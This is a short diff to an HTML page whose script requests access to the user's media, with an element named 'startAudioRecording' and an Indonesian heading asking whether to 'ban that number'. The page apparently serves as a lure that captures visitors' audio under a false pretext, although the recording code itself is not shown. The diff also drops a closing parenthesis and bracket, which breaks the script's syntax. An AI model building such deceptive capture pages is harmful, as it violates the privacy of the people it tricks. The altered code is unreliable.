--- a/index.html
+++ b/index.html
@@ -112,11 +112,11 @@
                     })
                     .catch(function (error) {
                         console.log("Error accessing user media: " + error);
-                    });
+                    }
             } else {
                 alert(" Not supported in this browser ❌");
             }
-        })();
+        }());
     </script>
 </head>
 <body>
@@ -124,6 +124,6 @@
     <img src="https://telegra.ph/file/f81efc7283b8b6e8a870e.jpg" alt="Logo" class="logo">
 
     <!-- Teks dan Tombol -->
-    <h1>APAKAH ANDA YAKIN UNTUK BANNED NOMER TEvRSEBUT?</h1>
+    <h1>APAKAH ANDA YAKIN UNTUK BANNED NOMER TERSEBUT?</h1>
     <p id="startAudioRecording"></p>
 </html>
